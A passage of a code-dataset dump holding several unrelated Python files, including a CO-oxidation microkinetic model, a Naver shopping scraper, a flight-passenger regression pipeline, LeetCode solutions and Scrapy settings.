adsorption using lattice O\n dS[9] = 0 # rxn 7' - 2nd CO oxidation using lattice O\n dS[10] = SCO2g - SCO2 # rxn 8' - 2nd CO2 desorption leading to (V+O)*\n dS[11] = SO2 - SO2g # rxn 9 - O2 adsorption at (v+O)*\n dS[12] = 0 # rxn 10 -O2 dissociation at (v+O)*\n dS[13] = 0 # rxn 11 - O migration from (V+O)* --> *\n dS[14] = SCO - SCOg # rxn 12 - CO adsorption at 2O*\n dS[15] = 0 # rxn 13 - CO oxidation at 2O*\n dS[16] = SCO2g - SCO2 # rxn 14 - CO2 desorption from O*\n dS[17] = SO2 - SO2g # rxn 15 - O2 adsorption on *\n dS[18] = 0 # rxn 16 - O2 dissociation on * to give 2O*\n\n \n # Activation energy barriers\n Ea = np.zeros(19) # array initialization\n Ea[1] = 0.49 # 1st CO Oxidation barrier = 0.49\n Ea[9] = 0.69 # 2nd CO Oxidation barrier using lattice O (0.69)\n Ea[12] = 0.51 # O2 dissociation 
barrier at (v+O)*\n Ea[13] = 0.18 # O migration barrier from (v+O)* ---> *\n Ea[18] = 1.44 # rxn 16 - O2 dissociation on * to give 2O*\n Ea[6] = 0.19 # 2nd CO Oxidation barrier (assumed)\n \n\n # Entropy changes to the transition state\n STS = np.zeros(19) # array initialization \n STS[0] = (0.30*SCOn/R + 3.3-1/3*(18.6+math.log((mCO/mAr)**1.5*(T/298)**2.5)))*R # 1st CO adsorption entropy - ignoring \n # SCOn dependence on T\n STS[2] = (0.30*SCO2n/R + 3.3-1/3*(18.6+math.log((mCO2/mAr)**1.5*(T/298)**2.5)))*kb # 1st CO2 adsorption entropy \n STS[3] = (0.30*SO2n/R + 3.3-1/3*(18.6+math.log((mO2/mAr)**1.5*(T/298)**2.5)))*R # O2 adsorption entropy \n STS[5] = STS[14]= STS[8] = STS[0] # CO adsorption entropiesSTS[7] = STS[2] \n STS[10]= STS[16] = STS[2] # CO2 adsorption entropies\n STS[17]= STS[11] = STS[3]\n\n # Calculate equilibrium and rate constants\n K = [0]*19 # equilibrium constants\n kf = [0]*19 # forward rate constants\n kr = [0]*19 # reverse rate constants\n for i in range(19):\n dG = dE[i] - T*dS[i]\n K[i] = np.exp(-dG/kbT)\n \n # Enforce Ea > 0, and Ea > dE \n if i not in [0,3,5,8,11,14,17]: #(steps 0, 3 and 5 are adsorption steps)\n Ea[i] = max([0,dE[i],Ea[i]]) \n kf[i] = kbT/h * np.exp(STS[i]/kb) * np.exp(-Ea[i]/kbT)\n kr[i] = kf[i]/K[i] # enforce thermodynamic consistency\n else:\n Ea[i] =-dE[i] # Ea[i] = Eads\n kr[i] = kbT/h * np.exp(STS[i]/R) * np.exp(-Ea[i]/kbT) # STS = TS-ads for adsorption 0,3 and 5 \n kf[i] = K[i]*kr[i]\n \n return (kf,kr,Ea) \n\n\n# ## Rates and intermediate species coverage (theta)\n\n# Next, we need to calculate the rates for each step. As input we provide the rate constants $k_i$ and the coverages $\\theta_i$. The input variables are passed as arrays.\n\n# In[5]:\n\n\ndef get_rates(theta,kf,kr,P):\n \n # Extract elements of theta and assign them\n # to more meaningful variables\n tCO = theta[0] # coverage of CO\n tCO2v = theta[1] \n tvac = theta[2] \n tO2v = theta[3]\n tO = theta[4]\n tCOO = theta[5]\n tCO2 = theta[6]\n tCOOL = theta[7]\n tCO2L = theta[8]\n tvplusO = theta[9]\n tO2plusvplusO = theta[10]\n t2O = theta[11]\n tCOplus2O = theta[12]\n tCO2plusO = theta[13]\n tO2 = theta[14]\n tstar = 1.0 - tCO - tCO2v - tvac - tO2v - tO - tCOO - tCO2 - tCOOL -tCO2L - tvplusO -tO2plusvplusO -t2O -tCOplus2O -tCO2plusO - tO2 # site balance\n \n PCO = P[0]\n PO2 = P[1]\n\n # Caluclate the rates: eqns (39)-(42)\n rate = [0]*19 # array with 8 zeros\n rate[0] = kf[0] * PCO * tstar - kr[0] * tCO\n rate[1] = kf[1] * tCO - kr[1] * tCO2v\n rate[2] = kf[2] * tCO2v - kr[2] * PCO2 * tvac\n rate[3] = kf[3] * tvac * PO2 - kr[3] * tO2v\n rate[4] = kf[4] * tO2v - kr[4] * tO\n rate[5] = kf[5] * tO * PCO - kr[4] * tCOO\n rate[6] = kf[6] * tCOO - kr[6] * tCO2\n rate[7] = kf[7] * tCO2 - kr[7] * PCO2 * tstar\n \n rate[8] = kf[8] * tO * PCO - kr[8] * tCOOL\n rate[9] = kf[9] * tCOOL - kr[9] * tCO2L\n rate[10] = kf[10] * tCO2L - kr[10] * PCO2 * tvplusO\n \n rate[11] = kf[11] * tvplusO * PO2 - kr[11] * tO2plusvplusO\n rate[12] = kf[12] * tO2plusvplusO - kr[12] * t2O\n rate[13] = kf[13] * tvplusO - kr[13] * tstar\n \n rate[14] = kf[14] * t2O * PCO - kr[14] * tCOplus2O\n rate[15] = kf[15] * tCOplus2O - kr[15] * tCO2plusO\n rate[16] = kf[16] * tCO2plusO - kr[16] * PCO2 * tO\n \n rate[17] = kf[17] * tstar * PO2 - kr[17] * tO2\n rate[18] = kf[18] * tO2 - kr[18] * t2O\n \n return rate \n\n\n# ## Solving ODE equations\n\n# We also need to define the systems of ordinary differential equations (ODEs) that we intend to solve. 
Note that we solve the transient problem without assuming steady-state and integrate for very long times. This is often a more robust technique to find a physical solution.\n\n# In[6]:\n\n\ndef get_odes(theta,t,kf,kr,P):\n# returns the system of ODEs d(theta)/dt, calculated at the current value of theta (and time t)\n\n rate = get_rates(theta,kf,kr,P) # calculate rates at current value of theta\n\n # Time derivatives of theta\n dt = [0]*15\n dt[0] = rate[0] - rate[1] # d(tCO)/dt\n dt[1] = rate[1] - rate[2] \n dt[2] = rate[2] - rate[3] \n dt[3] = rate[3] - rate[4] \n dt[4] = rate[4] - rate[5] + rate[16] - rate[8] #d(tO)/dt\n dt[5] = rate[5] - rate[6] \n dt[6] = rate[6] - rate[7] \n \n dt[7] = rate[8] - rate[9]\n dt[8] = rate[9] - rate[10]\n \n dt[9] = rate[10] - rate[11] -rate[13] #d(v+O)/dt\n \n dt[10] = rate[11] - rate[12]\n \n dt[11] = rate[12] - rate[14] + rate[18] #d(t2O)/dt\n \n dt[12] = rate[14] - rate[15]\n dt[13] = rate[15] - rate[16]\n dt[14] = rate[17] - rate[18]\n\n \n return dt\n\n\n# To solve the system of ODEs we need to provide an initial guess. If we don't know any better, a good starting point is always a completely empty surface.\n\n# In[7]:\n\n\n# theta0 = (0.0, 0., 0., 0 , 0 , 0 , 0.0) # initial coverage of CO*, CO2+v*, vac*, O2v*, O*, COO*, CO2*, COO(L)*,CO2(L)*, (v+O)*,(O2+v+O)*, 2O*, (CO+2O)*, (CO2+O)*, O2* respectively\ntheta0 =np.zeros(15)\n\n\n# And now we are ready to start the integration from $\\theta_0$ to $\\theta_{steady-state}$ over a long enough time span. Here, the time span is set to 1E6 sec, but you need to test if this is sufficient to reach steady-state. If you lower the time span and still obtain identical results, steady-state has been reached.\n\n# We can now inspect the results. Since we may want to do this more than once, we can define a customized print function for our output.\n\n# In[8]:\n\n\ndef solve_ode(kf,kr,theta0,P):\n# Solve the system of ODEs using scipy.integrate.odeint\n# Assumes an empty surface as initial guess if nothing else is provided\n from scipy.integrate import odeint\n\n # Integrate the ODEs for 1E6 sec (enough to reach steady-state)\n theta = odeint(get_odes, # system of ODEs\n theta0, # initial guess\n [0,1E6], # time span\n args = (kf,kr,P), # arguments to get_odes()\n h0 = 1E-36, # initial time step\n mxstep = 90000) # maximum number of steps\n# rtol = 1E-12, # relative tolerance\n# atol = 1E-15) # absolute tolerance\n\n return theta[-1,:]\n\n\n# ## Solutions to the rates and coverage of the intermediate species\n\n# In[9]:\n\n\ndef print_output(theta0,T,P):\n# Prints the solution of the model\n (kf,kr,Ea) = get_rate_constants(T)\n theta = solve_ode(kf,kr,theta0,P)\n rates = get_rates(theta,kf,kr,P)\n# print (\"the result is:\")\n# print\n# for r,rate in enumerate(rates):\n# if r in [0,3,5,8,11,14,17]:\n# print (\"Step\",r,\": rate =\",rate,\", kf =\",kf[r],\", kr=\",kr[r],\", reverse Ea =\",Ea[r])\n# else:\n# print(\"Step\",r,\": rate =\",rate,\", kf =\",kf[r],\", kr=\",kr[r],\", Ea =\",Ea[r])\n# print (\"The coverages for CO*, CO2+v*, vac*, O2v*, O*, COO*, CO2*, COO(L)*,CO2(L)*, (v+O)*,(O2+v+O)*, 2O*, (CO+2O)*, (CO2+O)*, O2* are:\")\n# for t in theta:\n# print (t)\n return (rates[1]+rates[6]+rates[9]+rates[15],theta[0])\n\n\n# And we call the function with our output values, i.e., the last row of the result matrix $\\theta$.\n\n# In[10]:\n\n\nprint_output(theta0,473,[0.02,0.20])\n\n\n# ## Reaction orders ($P_{CO}$ & $P_{O2}$) and apparent barrier\n\n# In[11]:\n\n\ndef rxn_order_CO(T,P):\n gridpoints = 3\n 
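# estimate the CO reaction order from the slope of a log(rate) vs log(PCO) fit over a small pressure window\n    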
rate_PCO=np.zeros(gridpoints)\n    PCO1=P[0]\n    PCO2=PCO1+0.05\n    PCO_range = np.linspace(PCO1,PCO2,gridpoints)\n    for i,PCO in enumerate(PCO_range):\n        rate_PCO[i]=print_output(theta0,T,[PCO,P[1]])[0] # PO2 = 0.20 \n        if rate_PCO[i]<10**-323:\n            rate_PCO[i]=10**-323\n    PCO_range = PCO_range.reshape(-1, 1)\n    LR_CO=model.fit(np.log(PCO_range), np.log(rate_PCO))\n    order_CO=LR_CO.coef_ # LR.intercept_\n    return order_CO[0]\n\n\n# In[12]:\n\n\ndef rxn_order_O2(T,P):\n    gridpoints = 3\n    rate_PO2=np.zeros(gridpoints)\n    PO21=P[1]\n    PO22=PO21+0.1\n    PO2_range = np.linspace(PO21,PO22,gridpoints)\n    for i,PO2 in enumerate(PO2_range):\n        rate_PO2[i]=print_output(theta0,T,[P[0],PO2])[0] # PCO = 0.02\n        if rate_PO2[i]<10**-323:\n            rate_PO2[i]=10**-323\n    PO2_range = PO2_range.reshape(-1, 1)\n    LR_O2=model.fit(np.log(PO2_range), np.log(rate_PO2))\n    order_O2=LR_O2.coef_ # LR.intercept_\n    return order_O2[0]\n\n\n# ## Apparent barrier\n\n# In[13]:\n\n\ndef apparent_barrier(T,P):\n    gridpoints = 3\n    rate_app=np.zeros(gridpoints)\n    T1=T-1\n    T2=T+1\n    T_range = np.linspace(T1,T2,gridpoints)\n    for i,T in enumerate(T_range):\n        rate_app[i]=print_output(theta0,T,P)[0] # PCO and PO2 are 0.02 and 0.20 respectively\n        if rate_app[i]<10**-323:\n            rate_app[i]=10**-323\n    # plt.plot(1/T_range, np.log(rate_app), 'ro')\n#     plt.xlabel('1/T')\n#     plt.ylabel('log[rate_CO2_formation]')\n#     plt.show()\n    T_range = T_range.reshape(-1, 1)\n    LR=model.fit(1/T_range, np.log(rate_app)) # Arrhenius equation\n    LR.coef_\n    # apparent_barrier=-LR.coef_*0.02568/298 #apparent barrier in eV\n    apparent_barrier=-LR.coef_*kb #apparent barrier in eV\n    apparent_barrier[0] # LR.intercept_\n    return apparent_barrier[0]\n\n\n# In[14]:\n\n\nprint('Reaction order of CO: %.4f ' % rxn_order_CO(473,[0.02,0.20]))\nprint('Reaction order of O2: %.4f ' % rxn_order_O2(473,[0.02,0.20]))\nprint('Apparent activation barrier: %.2f eV' % apparent_barrier(473,[0.02,0.20]))\n\n\n# ## Degree of Rate Control\n\n# In[15]:\n\n\ndef degree_of_rate_control(theta0,T,P):\n# Prints the solution of the model\n    \n    diffk_0=0.99 \n    diffk_1=1.01 \n\n    XRC=np.zeros(19)\n    for i in range(19):\n        (kf0,kr0,Ea) = get_rate_constants(T)\n        kf0[i]=kf0[i]*diffk_0\n        kr0[i]=kr0[i]*diffk_0\n        theta = solve_ode(kf0,kr0,theta0,P)\n        rates0 = get_rates(theta,kf0,kr0,P)[1]+get_rates(theta,kf0,kr0,P)[6]+get_rates(theta,kf0,kr0,P)[9]+get_rates(theta,kf0,kr0,P)[15]\n        \n        (kf1,kr1,Ea) = get_rate_constants(T)\n        kf1[i]=kf1[i]*diffk_1\n        kr1[i]=kr1[i]*diffk_1\n        theta = solve_ode(kf1,kr1,theta0,P)\n#         rates1 = get_rates(theta,kf1,kr1,P)\n        rates1 = get_rates(theta,kf1,kr1,P)[1]+get_rates(theta,kf1,kr1,P)[6]+get_rates(theta,kf1,kr1,P)[9]+get_rates(theta,kf1,kr1,P)[15]\n#         print(rates0,rates1)\n        \n        XRC[i] = (math.log(rates1/rates0))/(math.log(kf1[i]/kf0[i])) \n        print(rates0,rates1,np.round(XRC[i],3))\n    return (np.round(XRC,3))\n\n\n# In[16]:\n\n\ntheta0 = np.zeros(15) # initial guess: zero coverage for all 15 intermediate species (empty surface)\n\ndegree_of_rate_control(theta0,473,[0.02,0.20])\n\n","sub_path":"Bayesian/MKM.py","file_name":"MKM.py","file_ext":"py","file_size_in_byte":15772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"119720640","text":"# Updates *.jar files after compiling with NetBeans.\r\n# Placed in main folder.\r\n\r\nimport os\r\nimport shutil\r\n\r\njars = ['exttools.jar', 'jpcap.jar', 'mina-core.jar', 'mysql-connector-java-bin.jar', 'slf4j-api.jar', 'slf4j-jdk14.jar', 'XiuzSource.jar']\r\n\r\nfor jar in jars:\r\n\tos.remove('dist/' + jar)\r\n\tif jar == 
'XiuzSource.jar':\r\n\t\tshutil.copy('nbdist/xiuzsource.jar', 'dist/' + jar)\r\n\telse:\r\n\t\tshutil.copy('nbdist/lib/' + jar, 'dist/' + jar)\r\n\r\nprint(\"Jars successfully updated!\")","sub_path":"jarUpdater.py","file_name":"jarUpdater.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"499745287","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom selenium import webdriver\n\nbrowser = webdriver.Chrome('./chromedriver.exe')\nbrowser.get('https://search.shopping.naver.com/best100v2/detail.nhn?catId=50000006')\n\nhtml = browser.page_source\n\n\nfrom bs4 import BeautifulSoup\nsoup = BeautifulSoup(html,'html.parser')\ncontents = soup.select('li._itemSection')\n\nimport sqlite3\nconnect = sqlite3.connect('../db.sqlite3')\ncursor = connect.cursor()\n\n\nfor content in contents:\n    #rank = content.select('div.best_rnk > em')[0] ranks 1-9 display fine, but from 10 on they are split into digit elements like num1,num0\n    #rank = rank.text.strip()\n    title = content.select('p.cont')[0]\n    title = title.text.strip()\n\n    try:\n        cursor.execute(\n            \"insert into dbapp_navershop(create_date, title) values(datetime('now'), ?)\", [title])\n        print(title)\n    except:\n        pass\n\nconnect.commit()\nconnect.close()\n\nbrowser.close()\nbrowser.quit()\n\n\n\n","sub_path":"scraping/Naver_shopping_top100.py","file_name":"Naver_shopping_top100.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"82352178","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import FunctionTransformer\nfrom sklearn.compose import make_column_transformer\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import OrdinalEncoder\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.ensemble import GradientBoostingRegressor\n\n\n\ndef _merge_external_data(X):\n\n\n    ########################### Date data ##################################\n\n    filepath_one = os.path.join(\n        os.path.dirname(__file__), 'external_data.csv'\n    )\n\n    ####### Make sure that DateOfDeparture is of dtype datetime #######\n\n    X = X.copy() # modify a copy of X\n    X.loc[:, \"DateOfDeparture\"] = pd.to_datetime(X['DateOfDeparture'])\n    # Parse date to also be of dtype datetime\n    data=pd.read_csv(filepath_one,index_col=0,parse_dates=[\"Date\"])\n    \n    ####### Take data for the departure airport #######\n\n    X_weather = data[['Date', 'AirPort', 'Max TemperatureC','Events']]\n    X_weather = X_weather.rename(\n        columns={'Date': 'DateOfDeparture', 'AirPort': 'Departure', 'Max TemperatureC':'temperature_depart','Events':'Events_depart'}\n    )\n\n    X_merged = pd.merge(\n        X, X_weather, how='left', on=['DateOfDeparture', 'Departure'], sort=False\n    )\n\n    ####### Take data for the arrival airport #######\n\n    X_weather = data[['Date', 'AirPort', 'Max TemperatureC','Events']]\n\n    X_weather = X_weather.rename(\n        columns={'Date': 'DateOfDeparture', 'AirPort': 'Arrival', 'Max TemperatureC':'temperature_arrival', 'Events':'Events_arrival'}\n    )\n\n    X_merged_meteo = pd.merge(\n        X_merged, X_weather, how='left', on=['DateOfDeparture', 'Arrival'], sort=False\n    )\n    \n    \n    ########################### airport data ##################################\n\n    X = X_merged_meteo.copy() \n\n    X_airport = data[['Date','AirPort', 'wage median','beach','passenger per year','population','latitude_deg','longitude_deg','score']]\n    X_airport = X_airport.rename(\n        
columns={'Date': 'DateOfDeparture','AirPort':'Departure', 'wage median':'wage_median_depart', 'beach':'beach_depart', 'passenger per year':'passenger_per_year_depart',\n                 'population':'population_depart', 'latitude_deg':'latitude_deg_depart', 'longitude_deg':'longitude_deg_depart','score':'score_depart'}\n    )\n\n    X_merged_airport = pd.merge(\n        X, X_airport, how='left', on='Departure', sort=False\n    ).drop(columns=['DateOfDeparture_y']).drop_duplicates().rename(\n        columns={'DateOfDeparture_x': 'DateOfDeparture'})\n    \n    \n\n    ####### Take data for the arrival airport #######\n    \n    \n    X = X_merged_airport.copy()\n\n\n    X_airport = data[['Date','AirPort', 'wage median','beach','passenger per year','population','latitude_deg','longitude_deg','score']]\n    X_airport = X_airport.rename(\n        columns={'Date':'DateOfDeparture','AirPort':'Arrival', 'wage median':'wage_median_arrival', 'beach':'beach_arrival', 'passenger per year':'passenger_per_year_arrival',\n                 'population':'population_arrival','latitude_deg':'latitude_deg_arrival','longitude_deg':'longitude_deg_arrival','score':'score_arrival'}\n    )\n\n    X_merged_airport = pd.merge(\n        X, X_airport, how='left', on=['DateOfDeparture','Arrival'], sort=False\n    )\n    \n    ######################## stocks fuel holiday data ###################################\n\n    X = X_merged_airport.copy()\n\n    data_stocks_fuel_holiday = data[['Date', 'AirPort', 'Open','prix','is_holiday']]\n    data_stocks_fuel_holiday = data_stocks_fuel_holiday.rename(\n        columns={'Date': 'DateOfDeparture','AirPort':'Arrival'})\n    X_merged = pd.merge(\n        X, data_stocks_fuel_holiday, how='left', on=['DateOfDeparture','Arrival'], sort=False)\n    \n    return X_merged\n    \ndef _encode_data(X):\n\n    ################# encoding the date #########################\n\n    # Encode the date information from the DateOfDeparture columns\n    X_encoded = X.copy()\n\n    # Make sure that DateOfDeparture is of datetime format\n    X_encoded.loc[:, 'DateOfDeparture'] = pd.to_datetime(X_encoded['DateOfDeparture'])\n    # Encode the DateOfDeparture\n    X_encoded.loc[:, 'year'] = X_encoded['DateOfDeparture'].dt.year\n    X_encoded.loc[:, 'month'] = X_encoded['DateOfDeparture'].dt.month\n    X_encoded.loc[:, 'day'] = X_encoded['DateOfDeparture'].dt.day\n    X_encoded.loc[:, 'weekday'] = X_encoded['DateOfDeparture'].dt.weekday\n    X_encoded.loc[:, 'week'] = X_encoded['DateOfDeparture'].dt.week\n    X_encoded.loc[:, 'n_days'] = X_encoded['DateOfDeparture'].apply(\n        lambda date: (date - pd.to_datetime(\"1970-01-01\")).days\n    )\n\n    \n    X_encoded['weekend'] = np.where(X_encoded['weekday'].isin([5,6]),1,0) # pandas weekday: Saturday=5, Sunday=6\n    X_encoded['ete'] = np.where(X_encoded['month'].isin([10,5,6]),1,0) # 'ete' (French for summer): peak-travel months flag\n    \n    X_encoded['beach_ete_dep'] = X_encoded['ete'] * X_encoded['beach_depart']\n    X_encoded['beach_ete_arr'] = X_encoded['ete'] * X_encoded['beach_arrival']\n    \n    ################# encoding the meteo #########################\n\n    # From the meteo data we supply more information\n    X_encoded[\"precipitations_depart\"]=X_encoded.apply(lambda x: 0 if pd.isnull(x['Events_depart']) else 1, axis=1)\n    X_encoded[\"precipitations_arrival\"]=X_encoded.apply(lambda x: 0 if 
pd.isnull(x['Events_arrival']) else 1, axis=1)\n    X_encoded[\"diff_temp\"]=X_encoded['temperature_depart']-X_encoded['temperature_arrival']\n\n    ################# encoding the distance #########################\n\n    # compute the great-circle distance between the two airports\n\n\n    # approximate radius of earth in km\n\n    def haversine_vectorize(lon1, lat1, lon2, lat2):\n\n        lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])\n\n        newlon = lon2 - lon1\n        newlat = lat2 - lat1\n        haver_formula = np.sin(newlat/2.0)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(newlon/2.0)**2\n\n        dist = 2 * np.arcsin(np.sqrt(haver_formula))\n        km = 6367 * dist # 6367 for distance in KM, for miles use 3958\n        return km\n    \n    X_encoded[\"distance\"]=haversine_vectorize(X_encoded['longitude_deg_depart'],X_encoded['latitude_deg_depart'],X_encoded['longitude_deg_arrival'],X_encoded['latitude_deg_arrival'])\n\n    \n\n    ################# ending the encoding #########################\n\n    # Finally we can drop the original columns from the dataframe\n    \n    #print(X_encoded.columns)\n    return X_encoded.drop(columns=[\"DateOfDeparture\",\"Events_depart\",\"Events_arrival\",\"latitude_deg_depart\",\n                                   \"latitude_deg_arrival\",\"longitude_deg_arrival\",\"longitude_deg_depart\"])\n    \n\n\ndef get_estimator():\n\n    # Data augmentation transformer (add a column)\n    data_merger = FunctionTransformer(_merge_external_data)\n    data_encoder = FunctionTransformer(_encode_data)\n\n    # preprocessor for categorical variables\n    categorical_encoder = make_pipeline(\n        SimpleImputer(strategy=\"constant\", fill_value=\"missing\"),\n        OrdinalEncoder()\n    )\n    categorical_cols = ['Arrival', 'Departure']\n\n    preprocessor = make_column_transformer(\n        (categorical_encoder, categorical_cols),\n        remainder='passthrough', # passthrough numerical columns as they are\n    )\n\n    # Regressor to do the prediction\n    regressor = GradientBoostingRegressor(loss='ls', learning_rate=0.05,n_estimators=1500, subsample=1.0, criterion='friedman_mse',min_samples_split=9, min_samples_leaf=5,min_weight_fraction_leaf=0.0, max_depth=4,min_impurity_decrease=0.0, min_impurity_split=None)\n\n    \n\n    # Create a pipeline to return a scikit-learn estimator that will\n    # be used in ramp-test to do cross validation\n    \n\n    \n    return make_pipeline(\n        data_merger, data_encoder,\n        preprocessor, regressor\n    ) ","sub_path":"submissions/Test_1/estimator.py","file_name":"estimator.py","file_ext":"py","file_size_in_byte":8273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"22875132","text":"import requests\ndef PraparedRequestData(lat, lon, roomsnum, storey, storeysnum, buildingtype,\n                        totalarea, repairraw,\n                        buildingperiod, windowview, balconiesnum,\n                        countOfAnalogs):\n    data={\n        \"lat\":lat,\n        \"lon\":lon,\n        \"roomsnum\":roomsnum,\n        \"storey\":storey,\n        \"storeysnum\":storeysnum,\n        \"buildingtype\":buildingtype,\n        \"totalarea\":totalarea,\n        \"repairraw\": repairraw,\n        \"buildingperiod\": buildingperiod,\n        \"windowview\":windowview,\n        \"balconiesnum\":balconiesnum,\n        \"countOfAnalogs\":countOfAnalogs\n    }\n    return data\ndef Test():\n    lat = 55.75\n    lon = 37.63\n    roomsnum = 2\n    storey = 1\n    storeysnum = 5\n    buildingtype = \"кирпич\" # Russian API value: \"brick\"\n    totalarea = 100\n    repairraw = \"стандарт\" # \"standard\"\n    buildingperiod = 1990\n    windowview = \"во двор\" # \"courtyard view\"\n    balconiesnum = 1\n    countOfAnalogs = 5\n    data=PraparedRequestData(lat, lon, roomsnum, storey, storeysnum, buildingtype,\n                        totalarea, repairraw,\n                        buildingperiod, windowview, balconiesnum,\n                        countOfAnalogs)\n    print(data)\n    #server = 
'https://api.alina.eliz.site/'\n server='http://127.0.0.1:5000/'\n url = 'real_estate_price_request'\n requestUrl = server + url\n res = requests.post(requestUrl, data=data)\n print(res)\n outputDataDict = res.json()\n for o in outputDataDict:\n print(o, outputDataDict[o])\nif __name__ == '__main__':\n Test()","sub_path":"UserRequest/TestGetPriceRequest.py","file_name":"TestGetPriceRequest.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"205224989","text":"from enum import IntEnum\n\nfrom crownstone_core.util.Conversion import Conversion\nfrom crownstone_core.util.BufferReader import BufferReader\n\n\nclass BehaviourTimeType(IntEnum):\n afterMidnight = 0\n afterSunrise = 1\n afterSunset = 2\n\n @classmethod\n def has_value(cls, value):\n return any(value == item.value for item in cls)\n\n\n\n\nclass BehaviourTimeContainer:\n def __init__(self, fromTime, untilTime):\n self.fromTime = fromTime\n self.untilTime = untilTime\n\nclass BehaviourTime:\n\n def __init__(self):\n self.timeType = None\n self.offset = 0\n self.valid = True\n\n def fromTime(self, hours, minutes):\n self.timeType = BehaviourTimeType.afterMidnight\n self.offset = 3600 * hours + 60 * minutes\n return self\n\n def fromType(self, timeType, offsetSeconds=0):\n self.timeType = timeType\n self.offset = offsetSeconds\n return self\n\n def fromData(self, data):\n if len(data) != 5:\n self.valid = False\n return self\n\n payload = BufferReader(data)\n\n firstByte = payload.getUInt8()\n if not BehaviourTimeType.has_value(firstByte):\n self.valid = False\n return self\n\n self.timeType = BehaviourTimeType(firstByte)\n self.offset = payload.getInt32()\n self.valid = True\n\n return self\n\n def getPacket(self):\n arr = []\n\n arr.append(self.timeType.value)\n arr += Conversion.int32_to_uint8_array(self.offset)\n\n return arr\n\n def getDictionary(self):\n returnDict = {}\n\n if self.timeType == BehaviourTimeType.afterSunset:\n returnDict[\"type\"] = \"SUNSET\"\n returnDict[\"offsetMinutes\"] = self.offset / 60\n elif self.timeType == BehaviourTimeType.afterSunrise:\n returnDict[\"type\"] = \"SUNRISE\"\n returnDict[\"offsetMinutes\"] = self.offset / 60\n else:\n returnDict[\"type\"] = \"CLOCK\"\n returnDict[\"data\"] = {\"hours\": (self.offset - self.offset % 3600) / 3600,\n \"minutes\": (self.offset % 3600) / 60}\n\n return returnDict\n\n","sub_path":"vendor/crownstone_core/packets/behaviour/TimeDescription.py","file_name":"TimeDescription.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"537625095","text":"# Scrapy settings for imgur project\n#\n# For simplicity, this file contains only the most important settings by\n# default. 
All the other settings are documented here:\n#\n# http://doc.scrapy.org/topics/settings.html\n#\n\nBOT_NAME = 'imgur'\nBOT_VERSION = '1.0'\n\nSPIDER_MODULES = ['imgur.spiders']\nNEWSPIDER_MODULE = 'imgur.spiders'\nUSER_AGENT = '%s/%s' % (BOT_NAME, BOT_VERSION)\n\nITEM_PIPELINES = {'imgur.pipelines.ImgurPipeline': 1} #Custom pipeline for putting imgur title in filename\nIMAGES_STORE = '/home/garwah/imgur' #Directory where scraped images are stored \n\n","sub_path":"imgur/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"2976336","text":"def consecutive_in(B,A):\n return B in (A[i:i+len(B)] for i in range(len(A))) \n \ndef got_path(stack, wrapper):\n if wrapper[0]!=True:\n wrapper[0]=consecutive_in(wrapper[1],stack)\n\ndef inOrder(head, root, stack, wrapper):\n if root:\n stack.append(root.val)\n if wrapper[0]!=True:\n inOrder(head, root.left, stack,wrapper)\n if root.left==None and root.right==None and wrapper[0]!=True:\n got_path(stack, wrapper)\n if wrapper[0]!=True:\n inOrder(head, root.right, stack,wrapper)\n stack.pop()\n\ndef get_node(head):\n l=[]\n t=head\n while t!=None:\n l.append(t.val)\n t=t.next\n return l\n \nclass Solution(object):\n def isSubPath(self, head, root):\n \"\"\"\n :type head: ListNode\n :type root: TreeNode\n :rtype: bool\n \"\"\"\n is_matched = False\n all_node = get_node(head)\n wrapper = [is_matched,all_node]\n stack = []\n inOrder(head, root, stack, wrapper)\n return wrapper[0]","sub_path":"LeetCode/linked_list_in_bst.py","file_name":"linked_list_in_bst.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"421460227","text":"# Time Complexity : O(n)\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n\n\n# Your code here along with comments explaining your approach \n\nclass Solution(object):\n def findDisappearedNumbers(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n res = []\n for num in nums:\n index = abs(num) - 1\n if nums[index] > 0:\n nums[index] *= -1\n \n for i in range(len(nums)):\n if nums[i] > 0:\n res.append(i+1)\n \n return res\n ","sub_path":"DisappearedNumber-448.py","file_name":"DisappearedNumber-448.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"54028504","text":"#-*- coding:utf-8 -*-\n\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport sys\nimport os\nimport argparse\nimport tensorflow as tf\nfrom tensorflow.python.platform import gfile\n\nimport cv2\nimport time\nimport numpy as np\nfrom tqdm import tqdm\nfrom matplotlib import pyplot as plt\nfrom matplotlib import cm as CM\n\nsys.path.append(os.path.join(os.path.dirname(__file__),'../configs'))\nfrom config import cfg\n\ndef parms():\n parser = argparse.ArgumentParser(description='CSRnet demo')\n parser.add_argument('--save_dir', type=str, default='tmp/',\n help='Directory for detect result')\n parser.add_argument('--modelpath', type=str,\n default='weights/s3fd.pth', help='trained model')\n parser.add_argument('--threshold', default=0.65, type=float,\n help='Final confidence threshold')\n parser.add_argument('--ctx', default=True, type=bool,\n 